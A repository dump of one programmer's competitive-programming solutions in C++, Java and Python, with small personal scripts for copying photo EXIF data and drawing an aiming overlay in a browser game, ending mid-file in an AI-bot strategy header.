"/trains/neerc/neerc.ifmo.ru.train.2014.09.23/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cstdio>\n#include <vector>\n#include <algorithm>\n\nusing namespace std;\n\nint n;\n\nvector <int> a;\nint main(){\n cin >> n;\n int x, y, ans = 0;\n for (int i = 0; i < n; ++i){\n cin >> y >> x;\n int c = a.size();\n if (c == 0 || x > a[c - 1]){\n a.push_back(x);\n ans++;\n }\n else{\n while (a.size() && x < a[a.size() - 1]){\n a.pop_back();\n }\n if (!(a.size() && x == a[a.size() - 1])){\n a.push_back(x);\n ans++;\n }\n }\n }\n cout << ans;\n\n}\n" }, { "alpha_fraction": 0.38016995787620544, "alphanum_fraction": 0.3971671462059021, "avg_line_length": 18.61111068725586, "blob_id": "975e6c64fbc109bd2eded4308268d2b353cf02eb", "content_id": "66a1322c44c306e6fc3a330f03f9aae7361cc765", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1765, "license_type": "no_license", "max_line_length": 50, "num_lines": 90, "path": "/trash/lab_da_smthng/minimax/main.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n\nusing namespace std;\n\nconst int INF = 1000000001;\nint n;\nvector< vector< int > > a;\nvector<int> dr, dc, p, minpos, minv;\nvector<bool> vis;\n\nint dfs(int k)\n{\n vis[k] = true;\n int t = p[k];\n int temp = k;\n int d = INF;\n for (int j = 1; j <= n; j++)\n if (!vis[j])\n {\n if (a[t][j] - dr[t] - dc[j] < minv[j])\n {\n minv[j] = a[t][j] - dr[t] - dc[j];\n minpos[j] = k;\n }\n if (minv[j] < d)\n {\n d = minv[j];\n temp = j;\n }\n }\n for (int j = 0; j <= n; j++)\n if (vis[j])\n {\n dr[p[j]] += d;\n dc[j] -= d;\n } else\n minv[j] -= d;\n return p[temp] != 0 ? dfs(temp) : temp;\n}\n\nvoid rec(int k)\n{\n p[k] = p[minpos[k]];\n if (minpos[k] != 0)\n rec(minpos[k]);\n}\n\nint ans()\n{\n for (int i = 1; i <= n; i++)\n {\n p[0] = i;\n minv.clear();\n vis.clear();\n minv.resize(n + 1, INF);\n vis.resize(n + 1, false);\n rec(dfs(0));\n }\n return -dc[0];\n}\n\nint main()\n{\n freopen(\"assignment.in\", \"r\", stdin);\n freopen(\"assignment.out\", \"w+\", stdout);\n scanf(\"%d\\n\", &n);\n a.resize(n + 1);\n dr.resize(n + 1);\n dc.resize(n + 1);\n p.resize(n + 1);\n minpos.resize(n + 1);\n for (int i = 1; i <= n; i++)\n {\n a[i].resize(n + 1);\n for (int j = 1; j <= n; j++)\n scanf(\"%d\", &a[i][j]);\n scanf(\"\\n\");\n }\n printf(\"%d\\n\", ans());\n for (int i = 1; i <= n; i++)\n printf(\"%d %d\\n\", p[i], i);\n fclose(stdin);\n fclose(stdout);\n return 0;\n}\n" }, { "alpha_fraction": 0.3886210322380066, "alphanum_fraction": 0.4223722219467163, "avg_line_length": 29.5, "blob_id": "e9d2a48372579f40d2f2886f13d74d4f940855a7", "content_id": "aaa84fb72b541f2cc738e6929a163d161d60369f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1037, "license_type": "no_license", "max_line_length": 156, "num_lines": 34, "path": "/scripts/copyExif.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "o=\"[0-9]*.jpg\"\ndir=${PWD##*/}\nfor i in $(ls); do\n if [[ -f $i ]]; then\n continue\n fi\n cd $i\n f=$(ls *IMG* | head -1)\n echo $i $f\n ex=$(exiv2 -p e $f | awk {'{printf $1 \"\\n\"; }'})\n for exifName in $ex; do\n exiv2 -v -M\"set $exifName $(exiv2 -p e $f | grep $exifName | head -1 | awk {'{for (i=4; i<NF; i++) printf $i \" \"; print $NF}'})\" $o 1>/dev/null 2>&1\n done\n exiv2 -v -M\"set Exif.Image.Orientation 1\" $o 1>/dev/null\n\n for j in $o; do\n if [[ -f $j ]]; then\n\n #exiv2 $f | grep timestamp | awk '{print $4$5}' | sed 's/:/ /g' | awk '{print $2$3$4}'\n #touch -amt $(exiv2 $f | grep timestamp | awk '{print $4$5}' | sed 's/:/ /g' | awk '{print $2$3$4}') $j\n d=\"$(date -r $f '+%Y-%m-%d %T %z')\"\n echo \"touch -d $d $j\"\n touch -d \"$d\" $j\n #touch -amt \"04272320\" $j\n fi\n done\n for j in $o; do\n if [[ -f $j ]]; then\n echo $dir$j\n cp -p \"$j\" \"../$dir$j\"\n fi\n done\n cd ..\ndone\n" }, { "alpha_fraction": 0.5043478012084961, "alphanum_fraction": 0.52173912525177, "avg_line_length": 56.5, "blob_id": "fd3b55857650d3c122b76143a83c1db57560fce1", "content_id": "ad3c89ef0c743ad90dd3cfa7381bee711ef4889f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 230, "license_type": "no_license", "max_line_length": 190, "num_lines": 4, "path": "/2015/tpp/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import re\nn = int(input())\ns = input()\nprint(\"YES\" if len(s) >= n and re.search(\"^([a-z]|[A-Z]|[0-9])*$\", s) != None and re.search(\"[a-z]\", s) != None and re.search(\"[A-Z]\", s) != None and re.search(\"[0-9]\", s) != None else \"NO\")\n" }, { "alpha_fraction": 0.5375335216522217, "alphanum_fraction": 0.5690348744392395, "avg_line_length": 28.254901885986328, "blob_id": "60c3a4bcbc08141ee61dd57751938708bbd7b0ea", "content_id": "c8d1ecb673f71cfb9b236d2a9dece5e71a8fde5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1492, "license_type": "no_license", "max_line_length": 70, "num_lines": 51, "path": "/scripts/shariki.js", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "let sx = 353;\nlet sy = 347;\nlet r = 21;\nlet mnx = 145 + r;\nlet mxx = 565 - r;\nlet svg = (...path) => `${sx} ${sy} ${path.join(' ')}`;\n\nlet xmlns = 'http://www.w3.org/2000/svg';\nlet boxWidth = 600;\nlet boxHeight = 400;\n\nlet svgElem = document.createElementNS(xmlns, 'svg');\nsvgElem.setAttributeNS(null, 'width', boxWidth);\nsvgElem.setAttributeNS(null, 'height', boxHeight);\nsvgElem.style['z-index'] = '10000 !important';\nsvgElem.style['position'] = 'absolute';\nsvgElem.style['pointer-events'] = 'none';\n\nlet g = document.createElementNS(xmlns, 'polyline');\ng.setAttributeNS(null, 'points', svg(0, 0))\ng.setAttributeNS(null, 'style', 'fill:none;stroke:red;stroke-width:1')\nsvgElem.appendChild(g);\n\nlet el = document.getElementById('game').childNodes[5].childNodes[0]\n\nel.insertBefore(svgElem, el.firstChild);\n\nlet eventListener = el => e => {\n let x = e.clientX - 55;\n let y = e.clientY - 255;\n if (y >= 320) return;\n let temp = [];\n if (x == sx)\n temp = [x, 0];\n else {\n let m = x > sx ? mxx : mnx;\n let getB = m => (m * (sy - y) + sx * y - sy * x) / (sx - x);\n let b = getB(m);\n let neb = getB(m == mxx ? mnx : mxx);\n let dy = neb - b;\n while (temp.length < 20) {\n temp = temp.concat(m, b);\n if (b < 0) break;\n m = m == mxx ? mnx : mxx;\n b -= dy;\n }\n }\n el.setAttributeNS(null, 'points', svg(...temp))\n};\n\nwindow.addEventListener('mousemove', eventListener(g), false)\n" }, { "alpha_fraction": 0.48966407775878906, "alphanum_fraction": 0.49896639585494995, "avg_line_length": 15.192468643188477, "blob_id": "88741dc2a0634c0971a0f2d9eebe9236a51cc615", "content_id": "bf3168f0c0cf23a670b9ec39bdbd7b52193b2b03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3870, "license_type": "no_license", "max_line_length": 72, "num_lines": 239, "path": "/CodeForce/0589/G.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.BufferedReader;\nimport java.io.File;\nimport java.io.FileReader;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.io.PrintWriter;\nimport java.util.ArrayList;\nimport java.util.Arrays;\nimport java.util.Comparator;\nimport java.util.HashMap;\nimport java.util.HashSet;\nimport java.util.List;\nimport java.util.Map;\nimport java.util.Set;\nimport java.util.StringTokenizer;\n\npublic class G {\n\n\tstatic BufferedReader bufferedReader;\n\tstatic StringTokenizer stringTokenizer;\n\tstatic PrintWriter out;\n\n\tclass Node {\n\t\tNode l, r;\n\t\tint f, t;\n\n\t\tint[] a, b, c;\n\t\tint[] u, d;\n\n\t\tlong[] s;\n\n\t\tNode(int id, int val) {\n\t\t\ta = new int[] { val };\n\t\t\tb = new int[] { id };\n\t\t\ts = new long[] { id };\n\n\t\t\tf = t = id;\n\t\t}\n\n\t\tNode(Node l, Node r) {\n\t\t\tthis.l = l;\n\t\t\tthis.r = r;\n\n\t\t\tf = l.f;\n\t\t\tt = r.t;\n\n\t\t\tint n = l.a.length;\n\t\t\tint m = r.a.length;\n\n\t\t\ta = new int[n + m];\n\t\t\tb = new int[n + m];\n\t\t\tc = new int[n + m];\n\n\t\t\tfor (int lp = 0, rp = 0, i = 0; i < a.length; i++) {\n\t\t\t\tif ((lp < n && (rp >= m || l.a[lp] <= r.a[rp]))) {\n\t\t\t\t\ta[i] = l.a[lp];\n\t\t\t\t\tb[i] = l.b[lp];\n\t\t\t\t\tc[i] = ~lp;\n\t\t\t\t\t++lp;\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\ta[i] = r.a[rp];\n\t\t\t\t\tb[i] = r.b[rp];\n\t\t\t\t\tc[i] = rp;\n\t\t\t\t\t++rp;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tu = new int[n + m];\n\t\t\td = new int[n + m];\n\n\t\t\ts = new long[n + m];\n\n\t\t\tint pu = -1, pd = -1;\n\t\t\tlong ps = 0;\n\n\t\t\tfor (int i = 0; i < s.length; i++) {\n\t\t\t\tu[i] = pu;\n\t\t\t\td[i] = pd;\n\t\t\t\ts[i] = ps;\n\n\t\t\t\tif (c[i] < 0) {\n\t\t\t\t\tu[i] = i;\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\td[i] = i;\n\t\t\t\t}\n\n\t\t\t\ts[i] += b[i];\n\n\t\t\t\tpu = u[i];\n\t\t\t\tpd = d[i];\n\t\t\t\tps = s[i];\n\n\t\t\t}\n\n\n\t\t}\n\n\t\tvoid sum(int from, int to, int i) {\n\t\t\tif (to < from || t < from || to < f) {\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\tif (from <= f && t <= to) {\n\t\t\t\tcurSum += s[i];\n\t\t\t\tcnt += i + 1;\n\t\t\t}\n\t\t\telse {\n\n\t\t\t\tint lp = u[i];\n\t\t\t\tif (lp != -1) {\n\t\t\t\t\tl.sum(from, to, ~c[lp]);\n\t\t\t\t}\n\n\t\t\t\tint rp = d[i];\n\t\t\t\tif (rp != -1) {\n\t\t\t\t\tr.sum(from, to, c[rp]);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t}\n\n\tlong curSum;\n\tlong cnt;\n\n\tlong sum(int d, int k) {\n\t\tcurSum = cnt = 0;\n\t\ttree.sum(d + 1, 1 << 21, k);\n\t\treturn curSum - cnt * d;\n\t}\n\n\tNode[] node;\n\tNode tree;\n\n\tvoid run() {\n\n\t\tint q = nextInt(), n = nextInt();\n\n\t\tnode = new Node[n];\n\n\t\tfor (int i = 0; i < n; i++) {\n\t\t\tint t = nextInt();\n\t\t\tnode[i] = new Node(t, i);\n\t\t}\n\n\t\tArrays.sort(node, new Comparator<Node>() {\n\t\t\tpublic int compare(Node u, Node v) {\n\t\t\t\tint cmp = Integer.compare(u.f, v.f);\n\t\t\t\tif (cmp == 0) {\n\t\t\t\t\treturn Integer.compare(u.a[0], v.a[0]);\n\t\t\t\t}\n\t\t\t\treturn cmp;\n\t\t\t}\n\t\t});\n\n\t\tint size = n;\n\t\twhile (size > 1) {\n\t\t\tint cur = 0;\n\n\t\t\tfor (int i = 1; i < size; i += 2) {\n\t\t\t\tnode[cur++] = new Node(node[i - 1], node[i]);\n\t\t\t}\n\n\t\t\tif (size % 2 == 1) {\n\t\t\t\tnode[cur++] = node[size - 1];\n\t\t\t}\n\t\t\tsize = cur;\n\t\t}\n\n\t\ttree = node[0];\n\n\t\twhile (--q >= 0) {\n\t\t\tint d = nextInt(), r = nextInt();\n\n\t\t\tint x = 0, y = n - 1;\n\n\t\t\twhile (y - x > 1) {\n\t\t\t\tint z = (x + y) / 2;\n\n\t\t\t\tif (sum(d, z) < r) {\n\t\t\t\t\tx = z;\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\ty = z;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif (sum(d, x) < r) {\n\t\t\t\t++x;\n\t\t\t}\n\n\t\t\tif (x == n || sum(d, x) < r) {\n\t\t\t\tout.print(0);\n\t\t\t}\n\t\t\telse {\n\t\t\t\tout.print(x + 1);\n\t\t\t}\n\t\t\tout.print(' ');\n\n\t\t}\n\n\t}\n\n\tint nextInt() {\n\t\treturn Integer.parseInt(next());\n\t}\n\n\tlong nextLong() {\n\t\treturn Long.parseLong(next());\n\t}\n\n\tString next() {\n\t\twhile (stringTokenizer == null || !stringTokenizer.hasMoreTokens()) {\n\t\t\tstringTokenizer = new StringTokenizer(nextLine());\n\t\t}\n\t\treturn stringTokenizer.nextToken();\n\t}\n\n\tString nextLine() {\n\t\ttry {\n\t\t\treturn bufferedReader.readLine();\n\t\t}\n\t\tcatch (IOException err) {\n\t\t\treturn null;\n\t\t}\n\t}\n\n\tpublic static void main(String[] args) throws IOException {\n\t\tbufferedReader = new BufferedReader(new InputStreamReader(System.in));\n\t\tout = new PrintWriter(System.out);\n\t\t// bufferedReader = new BufferedReader(new FileReader(task + \".txt\"));\n\t\t// out = new PrintWriter(new File(task + \".out\"));\n\t\tnew G().run();\n\t\tout.close();\n\t\tbufferedReader.close();\n\t}\n}\n" }, { "alpha_fraction": 0.5308411121368408, "alphanum_fraction": 0.5489096641540527, "avg_line_length": 24.887096405029297, "blob_id": "d8f12f9a8ae340b741c637f7edc2fbfa7d80dbfd", "content_id": "e95885d224248d9b19bbfe59e53b8fd6d5c22bcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1605, "license_type": "no_license", "max_line_length": 100, "num_lines": 62, "path": "/2021/yandexBackendQual/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import requests\nfrom xml.etree import ElementTree\n\ncontest = input()\nserver = 'http://127.0.0.1:7777/'\n\ndef get(url):\n response = requests.get(url)\n tree = ElementTree.fromstring(response.content)\n return tree\n\ndef participants():\n return get(server + f'view/participants?contest={contest}')\n\ndef submissions(login):\n return get(server + f'view/submissions?contest={contest}&login={login}')\n\n\nclass participant:\n def __init__(self, name, submissions):\n self.name = name\n self.ok = 0\n self.t = 0\n problems = set()\n s = {}\n cur = []\n for submit in submissions:\n cur.append([int(submit.get('timestamp')), submit.get('problem'), submit.get('verdict')])\n cur.sort(key = lambda submit: submit[0])\n for submit in cur:\n if submit[1] in problems:\n continue\n if submit[2] == 'CE':\n continue\n if submit[2] == 'OK':\n self.ok += 1\n self.t += submit[0] + s.get(submit[1], 0) * 20\n problems.add(submit[1])\n else:\n s[submit[1]] = s.get(submit[1], 0) + 1\n\n\n def __str__(self):\n return f'{self.name}, {self.ok}, {self.t}'\n\n\na = []\npars = participants()\nfor p in pars:\n login = p.get('login')\n subms = submissions(login)\n a.append(participant(login, subms))\n\na.sort(key = lambda p: [-p.ok, p.t])\nwinners = []\nfor i in range(len(a)):\n if a[i].ok == a[0].ok and a[i].t == a[0].t:\n winners.append(a[i].name)\n\nwinners.sort()\nprint(len(winners))\nprint(*winners, sep = '\\n')\n" }, { "alpha_fraction": 0.345502644777298, "alphanum_fraction": 0.36640211939811707, "avg_line_length": 32.45132827758789, "blob_id": "9d130c8de6a2500612e0f537f5f41004ad98f060", "content_id": "d4da494f8e7cafc187cb2b9e7967cfd28b210606", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3780, "license_type": "no_license", "max_line_length": 119, "num_lines": 113, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.25/GTODO.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n \n#define fori(n) for (int i = 0; i < n; ++i)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n \n#define fst first\n#define snd second\n#define pb push_back\n \ndouble const eps = 0.000000001;\n \nusing namespace std;\n \nstruct segment\n{\n double x, y, q, w;\n segment(double a, double b, double c, double d)\n {\n x = a;\n y = b;\n q = c;\n w = d;\n }\n};\n \ndouble dist(double x1, double y1, double x2, double y2)\n{\n return sqrt((x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2));\n}\n \nint ori(double x1, double y1, double x2, double y2, double x3, double y3)\n{\n double t = (x1 * y2 - x2 * y1) + (y1 * x3 - x1 * y3) + (x2 * y3 - x3 * y2);\n return t > eps ? -1 : t < -eps ? 1 : 0;\n}\n \ndouble distance(double sx, double sy, double a, double b, double c, double d)\n{\n if (a >= sx)\n return dist(sx, sy, a, b);\n if (c <= sx)\n return dist(sx, sy, c, d);\n //cout << \"lol \" << sy << \" \" << b << \"\\n\";\n return sy - b;\n}\n\nint main()\n{\n// freopen(\"in\", \"r\", stdin);\n int n;\n while (true)\n {\n cin >> n;\n if (n == 0)\n return 0;\n double sx, sy, x, y, z;\n cin >> sx >> sy;\n vector<segment> a;\n fori(n)\n cin >> y >> x >> z,\n a.pb(segment(x, y, z, y));\n segment t = a[0];\n double answer = 0;\n // fori(a.size())\n// a.pb(segment(a.back().x - 1, a.back().y, a.back().q + 1, a.back().w));\n fori1(a.size() - 1)\n {\n/* cout << \"S = \" << sx << \" \" << sy << \"\\n\";\n cout << \"T = \" << t.x << \" \" << t.y << \" \" << t.q << \" \" << t.w << \"\\n\";\n cout << \"a[i] = \" << a[i].x << \" \" << a[i].y << \" \" << a[i].q << \" \" << a[i].w << \"\\n\";\n cout << \"answer = \" << answer << \"\\n\\n\";\n */ //cout << \"ori s tb a[i]e \" << ori(sx, sy, t.x, t.y, a[i].q, a[i].w) << \"\\n\";\n //cout << \"ori s te a[i]b \" << ori(sx, sy, t.q, t.w, a[i].x, a[i].y) << \"\\n\";\n if (ori(sx, sy, t.x, t.y, a[i].q, a[i].w) != -1)\n answer += dist(sx, sy, t.x, t.y),\n sx = t.x,\n sy = t.y,\n t = a[i];\n else\n if (ori(sx, sy, t.q, t.w, a[i].x, a[i].y) != 1)\n answer += dist(sx, sy, t.q, t.y),\n sx = t.q,\n sy = t.w,\n t = a[i];\n else\n {\n if (ori(sx, sy, t.x, t.y, a[i].x, a[i].y) != 1)\n t.x = a[i].x,\n t.y = a[i].y;\n if (ori(sx, sy, t.q, t.w, a[i].q, a[i].w) != -1)\n t.q = a[i].q,\n t.w = a[i].w;\n }\n }\n //cout << \"answer = \" << answer << \"\\n\";\n //cout << \"S = \" << sx << \" \" << sy << \"\\nT = \";\n //cout << t.x << \" \" << t.y << \" \" << t.q << \" \" << t.w << \"\\nF = \";\n //cout << a.back().x << \" \" << a.back().y << \" \" << a.back().q << \" \" << a.back().w << \"\\n\";\n if (((abs(ori(sx, sy, t.x, t.y, a.back().x, a.back().y) +\n ori(sx, sy, t.x, t.y, a.back().q, a.back().w)) == 2 &&\n ori(sx, sy, sx, -1000000, t.x, t.y) == -1) ||\n\n (abs(ori(sx, sy, t.q, t.w, a.back().x, a.back().y) +\n ori(sx, sy, t.q, t.w, a.back().q, a.back().w)) == 2 &&\n ori(sx, sy, sx, -1000000, t.q, t.w) == 1)))\n answer += min(dist(sx, sy, t.x, t.y) + distance(t.x, t.y, a.back().x, a.back().y, a.back().q, a.back().w),\n dist(sx, sy, t.q, t.w) + distance(t.q, t.w, a.back().x, a.back().y, a.back().q, a.back().w));\n else\n answer += distance(sx, sy, a.back().x, a.back().y, a.back().q, a.back().w);\n printf(\"%.11lf\\n\", answer);\n }\n}\n" }, { "alpha_fraction": 0.28270041942596436, "alphanum_fraction": 0.3164556920528412, "avg_line_length": 25.33333396911621, "blob_id": "6283c0719c5b9639b5ed98d29846db882c9b245e", "content_id": "572e1e9c8a1133c3378d089d159c587696f4a183", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 68, "num_lines": 9, "path": "/CodeForce/0552/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "e = '1*' + input() + '*1'\nl = len(e)\na = 0\nfor i in range(2, l, 2):\n if (e[i - 1] == '*'):\n for j in range(i + 1, l, 2):\n if e[j] == '*':\n a = max(a, eval(e[:i] + '(' + e[i:j] + ')' + e[j:]))\nprint(a)\n" }, { "alpha_fraction": 0.4714946150779724, "alphanum_fraction": 0.4869029223918915, "avg_line_length": 21.379310607910156, "blob_id": "b44fe6a005a3b7f3ca2b5d00717b4b3810333ab9", "content_id": "2ac8798500a2d5bfbc79ee93f6887e37ab8d1948", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 649, "license_type": "no_license", "max_line_length": 50, "num_lines": 29, "path": "/2021/yandexBackendFinal/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import json\nimport sys\nsys.setrecursionlimit(10000000)\n\nn = int(input())\nroot = {}\n\ndef dfs(root, cur, attrs):\n for k in cur.keys():\n if k in attrs:\n root[k] = cur[k]\n else:\n if not k in root:\n root[k] = {}\n dfs(root[k], cur[k], attrs)\n\nfor i in range(n):\n command = input()\n if command == \"PRINT\":\n print(json.dumps(root, sort_keys=True))\n\n else:\n attrs = input().split()\n la = int(attrs[0])\n attrs = set(attrs[1:])\n l = int(input())\n j = '\\n'.join([input() for q in range(l)])\n j = json.loads(j)\n dfs(root, j, attrs)\n" }, { "alpha_fraction": 0.36624205112457275, "alphanum_fraction": 0.3747346103191376, "avg_line_length": 20.452381134033203, "blob_id": "ac6aa4fe875aa48b31b2dfa07fbd499fcb955e51", "content_id": "8272a7a8f9644ad18bb3d42dcbe9572508a61692", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1216, "license_type": "no_license", "max_line_length": 48, "num_lines": 42, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.20/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\r\n#include <cstdio>\r\n#include <bits/stdc++.h>\r\n \r\nusing namespace std;\r\n \r\nint main() {\r\n    int n, k;\r\n    queue<pair<int, int>> q;\r\n    scanf(\"%d%d\", &n, &k);\r\n    int t;\r\n    vector<int> a;\r\n    set<int> available;\r\n    int ans = 0;\r\n    for (int i = 0; i < n; ++i)\r\n    {\r\n        scanf(\"%d\", &t);\r\n        while (q.size() && q.front().first <= t)\r\n        {\r\n            int u = q.front().second;\r\n            a[u]--;\r\n            if (a[u] == k - 1)\r\n                available.insert(u);\r\n            q.pop();\r\n        }\r\n        int l;\r\n        if (!available.size())\r\n        {\r\n            l = a.size();\r\n            a.push_back(0);\r\n        } else\r\n            l = *available.begin();\r\n        a[l]++;\r\n        if (a[l] < k)\r\n            available.insert(l);\r\n        else\r\n            available.erase(l);\r\n        q.push({t + 1000, l});\r\n        ans = max(ans, (int)a.size());\r\n    }\r\n    printf(\"%d\\n\", ans);\r\n}\n" }, { "alpha_fraction": 0.4828571379184723, "alphanum_fraction": 0.488571435213089, "avg_line_length": 16.5, "blob_id": "1329ae3a7f715b39cfdaa749627e17e203fbbec7", "content_id": "0ba79ef24b65d0ffca329dbc5733f547d52ed291", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 350, "license_type": "no_license", "max_line_length": 39, "num_lines": 20, "path": "/trash/parser.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <stdio.h>\n#include <string>\n\nusing namespace std;\n\nint main()\n{\n freopen(\"in.txt\", \"r\", stdin);\n freopen(\"out.txt\", \"w\", stdout);\n string s;\n while (getline(cin, s))\n {\n if (s == \"\\n\")\n continue;\n int k = s.find(\"\\\"\");\n cout << s.substr(0, k) << endl;\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.36263737082481384, "alphanum_fraction": 0.38461539149284363, "avg_line_length": 19.16666603088379, "blob_id": "d5da0f8c7caeef873b6e60042f463a24654eeef5", "content_id": "dc70b9910646f2df8afd5afce0c834a0ba600d0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 364, "license_type": "no_license", "max_line_length": 53, "num_lines": 18, "path": "/CodeForce/0589/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\na = {}\nfor i in range(n):\n s = input()\n t = s.lower().rsplit('@', 1)\n if t[1] == 'bmail.com':\n t[0] = t[0].replace('.', '').split('+', 1)[0]\n t = t[0] + t[1]\n if t in a:\n a[t].append(s)\n else:\n a[t] = [s]\nprint(len(a))\nfor x in a:\n q = str(len(a[x]))\n for y in a[x]:\n q += ' ' + y\n print(q)\n\n" }, { "alpha_fraction": 0.705050528049469, "alphanum_fraction": 0.7252525091171265, "avg_line_length": 54, "blob_id": "39d7362c1f6a9283f6bc2bd6c3639f7768ab7061", "content_id": "77fc96704058d24f72e8bcb98b1e0432c7a8de2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 495, "license_type": "no_license", "max_line_length": 152, "num_lines": 9, "path": "/setup/README.md", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "* Video: [youtube]()\n\n* System: archlinux\n* DM: [awesome](https://wiki.archlinux.org/title/awesome)\n* Browser: [vivaldi](https://wiki.archlinux.org/title/Vivaldi)\n* Vim: [vimrc](https://github.com/Igorjan94/CF/configs/vimrc)\n* Zsh: [zshrc](https://github.com/Igorjan94/CF/configs/zshrc)\n* acedit: [github](https://github.com/Igorjan94/ACedIt.git) (ensure that branch is add-test). Fork of [coderick14](https://github.com/coderick14/ACedIt)\n* cf-tool: [github](https://github.com/xalanq/cf-tool)\n" }, { "alpha_fraction": 0.39880499243736267, "alphanum_fraction": 0.44393593072891235, "avg_line_length": 32.54370880126953, "blob_id": "02e9c35c74cd7d53a764f426a7cc8b2959c09b7d", "content_id": "ca231db071327aa4d610bf1afed6e15ca1ff9fe4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 15831, "license_type": "no_license", "max_line_length": 275, "num_lines": 469, "path": "/trains/ai/cpp-cgdk/old.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include \"MyStrategy.h\"\n\n#define PI 3.14159265358979323846\n#define _USE_MATH_DEFINES\n#define go(p, a, b) { if (p) goto a; else goto b; }\n\n#include <bits/stdc++.h>\n//#ifdef ONLINE_JUDGE\n//#define debug 1\n//#endif\n#ifdef debug\n#include <library.h>\n#endif\n\nusing namespace model;\nusing namespace std;\n\ndouble DIST_TO_NEXT = 750;\nint COUNT_OF_FAILS = 100;\nint FORCE_BACK = 130;\nint FORCE_RIGHT = 60;\nint FORCE = 100;\nint BREAK = 30;\ndouble MAX_SPEED = 17;\nint FORCE_SLOW_DOWN = 1;\nint GLOBAL_FAIL = 2;\ndouble ANGLE_THROW = PI / 30;\ndouble FAR_FAR_AWAY = 2.0;\ndouble FAR_FAR_AWAY_VALUE = -0.25;\ndouble SO_CLOSE = 1.0;\ndouble SO_CLOSE_VALUE = 0.4;\n\nbool changed = false;\ndouble eps = 5;\ndouble power = 0.85;\ndouble distToNext = -10000, prevDistance;\nint countOfFails = 0;\nint forceBack = 0;\nint forceRight = 0;\nint force = 0;\nint prevx = 0;\nint currx = -1234;\nint forceSlow = 0;\nint globalFail = 0;\nint snake = 0;\ndouble turn = 0.0;\ndouble tileSize = 0.0;\nint dir[15][4];\nvector<int> dx = {1, 0, -1, 0};\nvector<int> dy = {0, 1, 0, -1};\nvector<vector<TileType>> TEMP;\nbool init = true;\n\ntemplate <typename T>\nvoid ppp(vector<vector<T>> a)\n{\n int n = a.size();\n int m = a[0].size();\n for (int j = 0; j < m; ++j)\n for (int i = 0; i < n; ++i)\n printf(\"%6d%c\", a[i][j], \"\\n \"[i != n - 1]);\n}\n\nbool isCorner(TileType a) \n{\n return !(a == VERTICAL || a == HORIZONTAL || a == CROSSROADS);\n}\n\nvoid MyStrategy::move(const Car& self, const World& world, const Game& game, Move& move) {\n if (init)\n {\n init = false;\n ppp(world.getTilesXY());\n TEMP = world.getTilesXY();\n#ifdef debug\n writeln(world.getWaypoints());\n#endif\n srand(game.getRandomSeed());\n }\n tileSize = game.getTrackTileSize();\n auto a = world.getTilesXY();\n prevx = currx;\n if (prevx == -1234)\n prevx = self.getX();\n currx = self.getX();\n if (currx - prevx != 0)\n changed = true;\n int ti = self.getNextWaypointX();\n int tj = self.getNextWaypointY();\n auto wp = world.getWaypoints();\n int waypointIndex = self.getNextWaypointIndex();\n int fi, fj, pi, pj;\n if (waypointIndex < int(wp.size()) - 1)\n {\n int cx = int(self.getX() / tileSize);\n int cy = int(self.getY() / tileSize);\n int wx1 = wp[waypointIndex][0];\n int wx2 = wp[waypointIndex + 1][0];\n int wy1 = wp[waypointIndex][1];\n int wy2 = wp[waypointIndex + 1][1];\n if (\n (cx == wx1 && cx == wx2 && ((cy < wy1 && wy1 < wy2) || (cy > wy1 && wy1 > wy2)))\n ||\n (cy == wy1 && cy == 